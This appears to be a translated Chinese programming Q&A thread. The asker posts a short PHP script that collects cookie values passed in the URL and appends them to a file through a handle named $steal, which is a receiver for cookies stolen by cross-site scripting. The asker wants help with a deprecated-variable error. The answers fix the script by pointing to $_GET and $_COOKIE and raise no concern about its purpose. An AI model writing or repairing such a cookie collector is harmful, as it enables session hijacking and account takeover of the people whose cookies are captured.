<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
执行此代码时,我收到此错误:
注意:未定义的变量:第2行的HTTP_GET_VARS
请帮帮我
答案 0 :(得分:4)
你的$HTTP_GET_VARS["cookie"];
不存在,这就是问题......
注意:
$HTTP_GET_VARS [deprecated]
使用$_GET
代替。
此外,如果您尝试获取Cookie,则应使用$_COOKIE["name"]
答案 1 :(得分:0)
有关更多信息,请参阅此链接: http://php.net/manual/en/reserved.variables.get.php
添加John Conde和Kai Qing的评论是很好的答案